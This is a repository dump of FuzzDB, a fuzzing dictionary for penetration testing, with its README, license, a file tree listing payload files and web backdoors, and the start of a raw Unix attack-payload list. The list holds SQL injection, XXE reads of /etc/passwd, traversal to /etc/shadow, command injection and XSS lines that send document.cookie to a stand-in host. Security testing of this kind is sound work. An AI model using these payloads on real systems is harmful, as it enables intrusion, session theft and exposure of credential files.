Copy disabled (too large)
Download .txt
Showing preview only (16,329K chars total). Download the full file to get everything.
Repository: fuzzdb-project/fuzzdb
Branch: master
Commit: 5656ab25dc6b
Files: 375
Total size: 15.5 MB
Directory structure:
gitextract_ea3otx92/
├── .gitignore
├── README.md
├── _copyright.txt
├── attack/
│ ├── README.md
│ ├── all-attacks/
│ │ ├── all-attacks-unix.txt
│ │ ├── all-attacks-win.txt
│ │ └── all-attacks-xplatform.txt
│ ├── authentication/
│ │ ├── README.md
│ │ └── php_magic_hashes.fuzz.txt
│ ├── business-logic/
│ │ ├── CommonDebugParamNames.txt
│ │ ├── CommonMethodNames.txt
│ │ └── DebugParams.Json.fuzz.txt
│ ├── control-chars/
│ │ ├── HexValsAllBytes.txt
│ │ ├── NullByteRepresentations.txt
│ │ ├── imessage.txt
│ │ ├── terminal-escape-codes.txt
│ │ └── true.txt
│ ├── disclosure-directory/
│ │ └── directory-indexing-generic.txt
│ ├── disclosure-localpaths/
│ │ └── unix/
│ │ └── common-unix-httpd-log-locations.txt
│ ├── disclosure-source/
│ │ ├── README.md
│ │ ├── source-disc-cmd-exec-traversal.txt
│ │ ├── source-disclosure-generic.txt
│ │ └── source-disclosure-microsoft.txt
│ ├── email/
│ │ ├── invalid-email-addresses.txt
│ │ └── valid-email-addresses.txt
│ ├── file-upload/
│ │ ├── README.md
│ │ ├── alt-extensions-asp.txt
│ │ ├── alt-extensions-coldfusion.txt
│ │ ├── alt-extensions-jsp.txt
│ │ ├── alt-extensions-perl.txt
│ │ ├── alt-extensions-php.txt
│ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt
│ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
│ │ ├── file-ul-filter-bypass-microsoft-asp.txt
│ │ ├── file-ul-filter-bypass-ms-php.txt
│ │ ├── file-ul-filter-bypass-x-platform-generic.txt
│ │ ├── file-ul-filter-bypass-x-platform-php.txt
│ │ ├── invalid-filenames-linux.txt
│ │ ├── invalid-filenames-microsoft.txt
│ │ ├── invalid-filesystem-chars-microsoft.txt
│ │ ├── invalid-filesystem-chars-osx.txt
│ │ └── malicious-images/
│ │ ├── README.md
│ │ ├── eicar.com.txt
│ │ └── xssproject.swf
│ ├── format-strings/
│ │ └── format-strings.txt
│ ├── html_js_fuzz/
│ │ ├── HTML5sec_Injections.txt
│ │ ├── html_attributes.txt
│ │ ├── html_tags.txt
│ │ ├── javascript_events.txt
│ │ ├── js_inject.txt
│ │ └── quotationmarks.txt
│ ├── http-protocol/
│ │ ├── README.md
│ │ ├── crlf-injection.txt
│ │ ├── docs.http-method-defs.html
│ │ ├── hpp.txt
│ │ ├── http-header-cache-poison.txt
│ │ ├── http-protocol-methods.txt
│ │ ├── http-request-header-field-names.txt
│ │ ├── http-response-header-field-names.txt
│ │ ├── known-uri-types.txt
│ │ └── user-agents.txt
│ ├── integer-overflow/
│ │ └── integer-overflows.txt
│ ├── ip/
│ │ └── localhost.txt
│ ├── json/
│ │ └── JSON_Fuzzing.txt
│ ├── ldap/
│ │ ├── README.md
│ │ └── ldap-injection.txt
│ ├── lfi/
│ │ ├── JHADDIX_LFI.txt
│ │ ├── README.md
│ │ ├── common-ms-httpd-log-locations.txt
│ │ └── common-unix-httpd-log-locations.txt
│ ├── mimetypes/
│ │ └── MimeTypes.txt
│ ├── no-sql-injection/
│ │ ├── Readme.md
│ │ └── mongodb.txt
│ ├── os-cmd-execution/
│ │ ├── Commands-Linux.txt
│ │ ├── Commands-OSX.txt
│ │ ├── Commands-Windows.txt
│ │ ├── Commands-WindowsPowershell.txt
│ │ ├── OSCommandInject.Windows.txt
│ │ ├── README.md
│ │ ├── command-execution-unix.txt
│ │ ├── command-injection-template.txt
│ │ ├── shell-delimiters.txt
│ │ ├── shell-operators.txt
│ │ ├── source-disc-cmd-exec-traversal.txt
│ │ ├── useful-commands-unix.txt
│ │ └── useful-commands-windows.txt
│ ├── os-dir-indexing/
│ │ └── directory-indexing.txt
│ ├── path-traversal/
│ │ ├── README.md
│ │ ├── path-traversal-windows.txt
│ │ └── traversals-8-deep-exotic-encoding.txt
│ ├── redirect/
│ │ ├── README.md
│ │ ├── redirect-injection-template.txt
│ │ └── redirect-urls-template.txt
│ ├── rfi/
│ │ ├── README.md
│ │ └── rfi.txt
│ ├── server-side-include/
│ │ └── server-side-includes-generic.txt
│ ├── sql-injection/
│ │ ├── detect/
│ │ │ ├── GenericBlind.txt
│ │ │ ├── Generic_SQLI.txt
│ │ │ ├── MSSQL.txt
│ │ │ ├── MSSQL_blind.txt
│ │ │ ├── MySQL.txt
│ │ │ ├── MySQL_MSSQL.txt
│ │ │ ├── README.md
│ │ │ ├── oracle.txt
│ │ │ └── xplatform.txt
│ │ ├── exploit/
│ │ │ ├── README.md
│ │ │ ├── db2-enumeration.txt
│ │ │ ├── ms-sql-enumeration.txt
│ │ │ ├── mysql-injection-login-bypass.txt
│ │ │ ├── mysql-read-local-files.txt
│ │ │ └── postgres-enumeration.txt
│ │ └── payloads-sql-blind/
│ │ ├── README.md
│ │ ├── payloads-sql-blind-MSSQL-INSERT.txt
│ │ ├── payloads-sql-blind-MSSQL-WHERE.txt
│ │ ├── payloads-sql-blind-MySQL-INSERT.txt
│ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt
│ │ └── payloads-sql-blind-MySQL-WHERE.txt
│ ├── string-expansion/
│ │ └── shell-expansion.txt
│ ├── unicode/
│ │ ├── README.md
│ │ ├── corrupted.txt
│ │ ├── emoji.txt
│ │ ├── japanese-emoticon.txt
│ │ ├── naughty-unicode.txt
│ │ ├── regionalindicators.txt
│ │ ├── right-to-left.txt
│ │ ├── specialchars.txt
│ │ ├── two-byte-chars.txt
│ │ └── upsidedown.txt
│ ├── xml/
│ │ └── xml-attacks.txt
│ ├── xpath/
│ │ ├── README.md
│ │ └── xpath-injection.txt
│ └── xss/
│ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt
│ ├── README.md
│ ├── XSSPolyglot.txt
│ ├── all-encodings-of-lt.txt
│ ├── default-javascript-event-attributes.txt
│ ├── html-event-attributes.txt
│ ├── test.xxe
│ ├── xss-other.txt
│ ├── xss-rsnake.txt
│ └── xss-uri.txt
├── discovery/
│ ├── URI_SCHEMES/
│ │ └── IANA_registerd_URI_schemes.txt
│ ├── UserAgent/
│ │ ├── UserAgentListCommon.txt
│ │ ├── UserAgentListLarge.txt
│ │ └── UserAgents.txt
│ ├── WebSocket/
│ │ └── WebSocket-subprotocols.txt
│ ├── common-methods/
│ │ └── common-methods.txt
│ ├── dns/
│ │ ├── CcTLD.txt
│ │ ├── alexaTop1mAXFRcommonSubdomains.txt
│ │ ├── dnsmapCommonSubdomains.txt
│ │ └── gTLD.txt
│ └── predictable-filepaths/
│ ├── KitchensinkDirectories.txt
│ ├── Randomfiles.txt
│ ├── UnixDotfiles.txt
│ ├── backdoors/
│ │ ├── ASP_CommonBackdoors.txt
│ │ ├── bot_control_panels.txt
│ │ └── shells.txt
│ ├── cgi/
│ │ ├── CGI_HTTP_POST.txt
│ │ ├── CGI_HTTP_POST_Windows.txt
│ │ ├── CGI_Microsoft.txt
│ │ └── CGI_XPlatform.txt
│ ├── cms/
│ │ ├── README.md
│ │ ├── drupal_plugins.txt
│ │ ├── drupal_themes.txt
│ │ ├── joomla_plugins.txt
│ │ ├── joomla_themes.txt
│ │ ├── php-nuke.txt
│ │ ├── wordpress.txt
│ │ ├── wp_common_theme_files.txt
│ │ ├── wp_plugins.txt
│ │ ├── wp_plugins_full.txt
│ │ ├── wp_plugins_top225.txt
│ │ ├── wp_themes.readme
│ │ └── wp_themes.txt
│ ├── filename-dirname-bruteforce/
│ │ ├── 3CharExtBrute.txt
│ │ ├── CommonWebExtensions.txt
│ │ ├── Extensions.Backup.txt
│ │ ├── Extensions.Common.txt
│ │ ├── Extensions.Compressed.txt
│ │ ├── Extensions.Mostcommon.txt
│ │ ├── Extensions.Skipfish.txt
│ │ ├── WordlistSkipfish.txt
│ │ ├── copy_of.txt
│ │ ├── raft-large-directories-lowercase.txt
│ │ ├── raft-large-directories.txt
│ │ ├── raft-large-extensions-lowercase.txt
│ │ ├── raft-large-extensions.txt
│ │ ├── raft-large-files-lowercase.txt
│ │ ├── raft-large-files.txt
│ │ ├── raft-large-words-lowercase.txt
│ │ ├── raft-large-words.txt
│ │ ├── raft-medium-directories-lowercase.txt
│ │ ├── raft-medium-directories.txt
│ │ ├── raft-medium-extensions-lowercase.txt
│ │ ├── raft-medium-extensions.txt
│ │ ├── raft-medium-files-lowercase.txt
│ │ ├── raft-medium-files.txt
│ │ ├── raft-medium-words-lowercase.txt
│ │ ├── raft-medium-words.txt
│ │ ├── raft-small-directories-lowercase.txt
│ │ ├── raft-small-directories.txt
│ │ ├── raft-small-extensions-lowercase.txt
│ │ ├── raft-small-extensions.txt
│ │ ├── raft-small-files-lowercase.txt
│ │ ├── raft-small-files.txt
│ │ ├── raft-small-words-lowercase.txt
│ │ ├── raft-small-words.txt
│ │ ├── spanish.txt
│ │ ├── test_demo.txt
│ │ └── upload_variants.txt
│ ├── login-file-locations/
│ │ ├── Logins.txt
│ │ ├── cfm.txt
│ │ ├── html.txt
│ │ ├── jsp.txt
│ │ ├── php.txt
│ │ ├── windows-asp.txt
│ │ └── windows-aspx.txt
│ ├── password-file-locations/
│ │ └── Passwords.txt
│ ├── php/
│ │ ├── PHP.txt
│ │ └── PHP_CommonBackdoors.txt
│ ├── proxy-conf.txt
│ ├── tftp.txt
│ ├── webservers-appservers/
│ │ ├── ADFS.txt
│ │ ├── AdobeXML.txt
│ │ ├── Apache.txt
│ │ ├── ApacheTomcat.txt
│ │ ├── Apache_Axis.txt
│ │ ├── ColdFusion.txt
│ │ ├── FatwireCMS.txt
│ │ ├── Frontpage.txt
│ │ ├── HP_System_Mgmt_Homepage.txt
│ │ ├── HTTP_POST_Microsoft.txt
│ │ ├── Hyperion.txt
│ │ ├── IIS.txt
│ │ ├── JBoss.txt
│ │ ├── JRun.txt
│ │ ├── JavaServlets_Common.txt
│ │ ├── Joomla_exploitable.txt
│ │ ├── LotusNotes.txt
│ │ ├── Netware.txt
│ │ ├── Oracle9i.txt
│ │ ├── OracleAppServer.txt
│ │ ├── README.md
│ │ ├── Ruby_Rails.txt
│ │ ├── SAP.txt
│ │ ├── Sharepoint.txt
│ │ ├── SiteMinder.txt
│ │ ├── SunAppServerGlassfish.txt
│ │ ├── SuniPlanet.txt
│ │ ├── Vignette.txt
│ │ ├── Weblogic.txt
│ │ └── Websphere.txt
│ └── wellknown-rfc5785.txt
├── docs/
│ ├── attack-docs/
│ │ ├── rfi-cheatsheet.html
│ │ ├── source-directory-file-indexing-cheatsheet.html
│ │ ├── sqli/
│ │ │ └── docs.sql_injection_cheatsheet.html
│ │ ├── waf-bypass/
│ │ │ └── regexp-security-cheatsheet.md
│ │ └── xss/
│ │ └── docs.wasc-scriptmapping/
│ │ ├── ScriptMapping_Release_26Nov2007.html
│ │ └── license.txt
│ └── misc/
│ ├── KL0209LIT_fffap.html
│ └── htmlcodes-cheatsheet.htm
├── regex/
│ ├── README.md
│ ├── amazon.txt
│ ├── breakpoint-ignores.txt
│ ├── errors.txt
│ ├── nsa-wordlist.txt
│ ├── pii.readme.txt
│ ├── pii.txt
│ └── sessionid.txt
├── web-backdoors/
│ ├── README.md
│ ├── asp/
│ │ ├── cmd-asp-5.1.asp
│ │ ├── cmd.asmx
│ │ ├── cmd.asp
│ │ ├── cmd.aspx
│ │ ├── cmdasp.asp
│ │ ├── cmdasp.aspx
│ │ ├── dns.asp
│ │ ├── file.asp
│ │ ├── list.asp
│ │ ├── list.txt
│ │ ├── ntdaddy.asp
│ │ ├── proxy.asp
│ │ ├── shell.asp
│ │ ├── shell.aspx
│ │ └── up.asp
│ ├── c/
│ │ └── cmd.c
│ ├── cfm/
│ │ ├── cfExec.cfm
│ │ ├── cfSQL.cfm
│ │ ├── cmd.cfm
│ │ └── shell.cfm
│ ├── jsp/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ ├── UpServlet.java
│ │ ├── browser.jsp
│ │ ├── cmd.jsp
│ │ ├── cmdjsp.jsp
│ │ ├── jsp-reverse.jsp
│ │ ├── laudanum/
│ │ │ ├── cmd.war
│ │ │ ├── makewar.sh
│ │ │ └── warfiles/
│ │ │ ├── META-INF/
│ │ │ │ └── MANIFEST.MF
│ │ │ ├── WEB-INF/
│ │ │ │ └── web.xml
│ │ │ └── cmd.jsp
│ │ ├── list.jsp
│ │ ├── simple.jsp
│ │ ├── up.jsp
│ │ └── win32/
│ │ ├── cmd_win32.jsp
│ │ └── up_win32.jsp
│ ├── php/
│ │ ├── cmd.php
│ │ ├── dns.php
│ │ ├── file.php
│ │ ├── host.php
│ │ ├── killnc.php
│ │ ├── list.php
│ │ ├── php-backdoor.php
│ │ ├── php-reverse-shell.php
│ │ ├── proxy.php
│ │ ├── shell.php
│ │ ├── simple-backdoor.php
│ │ ├── tiny.php
│ │ └── up.php
│ ├── pl-cgi/
│ │ ├── cmd.pl
│ │ ├── list.pl
│ │ ├── perlcmd.cgi
│ │ └── up.pl
│ ├── servlet/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ └── UpServlet.java
│ ├── sh/
│ │ ├── cmd.sh
│ │ ├── list.sh
│ │ └── up.sh
│ └── wordpress/
│ ├── laudanum.php
│ └── templates/
│ ├── README.md
│ ├── dns.php
│ ├── file.php
│ ├── host.php
│ ├── ipcheck.php
│ ├── killnc.php
│ ├── php-reverse-shell.php
│ ├── proxy.php
│ ├── settings.php
│ └── shell.php
├── wordlists-misc/
│ ├── accidental_profanity.txt
│ ├── common-http-ports.txt
│ ├── numeric.txt
│ ├── resolvers.txt
│ ├── us_cities.txt
│ ├── wordlist-alphanumeric-case.txt
│ ├── wordlist-common-snmp-community-strings.txt
│ └── wordlist-dna.txt
└── wordlists-user-passwd/
├── db2/
│ ├── db2_default_pass.txt
│ ├── db2_default_user.txt
│ └── db2_default_userpass.txt
├── faithwriters.txt
├── generic-listpairs/
│ ├── http_default_pass.txt
│ ├── http_default_userpass.txt
│ └── http_default_users.txt
├── names/
│ └── namelist.txt
├── oracle/
│ ├── _hci_oracle_passwords.txt
│ ├── _oracle_default_passwords.txt
│ ├── oracle_login_password.txt
│ ├── oracle_logins.txt
│ └── oracle_passwords.txt
├── passwds/
│ ├── john.txt
│ ├── phpbb.txt
│ ├── twitter.txt
│ └── weaksauce.txt
├── postgres/
│ ├── postgres_default_pass.txt
│ ├── postgres_default_user.txt
│ └── postgres_default_userpass.txt
├── readme.txt
├── tomcat/
│ ├── tomcat_mgr_default_pass.txt
│ ├── tomcat_mgr_default_userpass.txt
│ └── tomcat_mgr_default_users.txt
└── unix-os/
├── unix_passwords.txt
└── unix_users.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.DS_Store
================================================
FILE: README.md
================================================
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.
**Attack Patterns -**
FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing.
These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs than [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).<br>
**Discovery -**
The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths).
FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.<br>
https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery
**Response Analysis -**
Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex).
FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.<br>
**Other useful stuff -**
Webshells in different languages, common password and username lists, and some handy wordlists.
**Documentation -**
Many directories contain a README.md file with usage notes.
A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included. <br>
### Usage tips for pentesting with FuzzDB ###
https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints
### How people use FuzzDB ###
FuzzDB is like an application security scanner, without the scanner.
Some ways to use FuzzDB:
* Website and application service black-box penetration testing with
* [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension
* Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner
* [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy
* To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more
* Inside custom tools for testing software and application protocols
* Crafting security test cases for GUI or command line software with standard test automation tools
* Incorporating into other Open Source software or commercial products
* In training materials and documentation
* To learn about software exploitation techniques
* To improve your security testing product or service
### How were the patterns collected? ###
Many, many hours of research and pentesting. And
* analysis of default app installs
* analysis of system and application documentation
* analysis of error messages
* researching old web exploits for repeatable attack strings
* scraping scanner payloads from http logs
* various books, articles, blog posts, mailing list threads
* other open source fuzzers and pentest tools
and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors
### Places you can find FuzzDB ###
Other security tools and projects that incorporate FuzzzDB in whole or part
* OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* SecLists https://github.com/danielmiessler/SecLists
* TrustedSec Pentesters Framework https://github.com/trustedsec/ptf
* Rapid7 Metasploit https://github.com/rapid7/metasploit-framework
* Portswigger Burp Suite http://portswigger.net
* Protofuzz https://github.com/trailofbits/protofuzz
* BlackArch Linux https://www.blackarch.org/
* ArchStrike Linux https://archstrike.org/
### Download ###
**Preferred method is to check out sources via git, new payloads are added frequently**
```
git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
```
While in the FuzzDB dir, you can update your local repo with the command
```
git pull
```
This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)
Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk.
### Who ###
FuzzDB was created by Adam Muntner (amuntner @ gmail.com)
FuzzDB (c) Copyright Adam Muntner, 2010-2019
Portions copyrighted by others, as noted in commit comments and README.md files.
The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know.
Submissions are always welcome!
Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/)
================================================
FILE: _copyright.txt
================================================
Copyright (c) 2010-2019, Adam Muntner
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of fuzzdb nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Licensed under Creative Commons - By Attribution
see
http://creativecommons.org/licenses/by/3.0/legalcode
----
contains dictionaries from Skipfish
Copyright 2010 Michal Zalewski
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
----
The MIT License (MIT)
Copyright (c) 2015 Max Woolf
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: attack/README.md
================================================
<h1>FuzzDB Attack Patterns</h1>
**WAF Evasion** <br>
* <a href=../master/docs/attack-docs/waf-bypass/regexp-security-cheatsheet.md>Regexp security Cheatsheet</a>
* Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md
================================================
FILE: attack/all-attacks/all-attacks-unix.txt
================================================
!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"><script>"
"><script>alert(1)</script>
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
">xxx<P>yyy
"\t"
#
#'
#'
#xA
#xA#xD
#xD
#xD#xA
$NULL
$null
%
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/
%00/etc/passwd%00
%01%02%03%04%0a%0d%0aADSF
%08x
%0A/usr/bin/id
%0A/usr/bin/id%0A
%0Aid
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%oa ping -n 30 127.0.0.1 %0a
%0a id %0a
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%0d
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
%0d%0aX-Injection-Header:%20AttackValue
%20
%20$(sleep%2050)
%20'sleep%2050'
%20d
%20n
%20s
%20x
%20|
%21
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%2500
%250a
%26
%27%20or%201=1
%28
%29
%2A
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2C
%2e%2e%2f
%3C
%3C%3F
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%5C
%5C/
%60
%7C
%7f
%99999999999s
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%ff
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
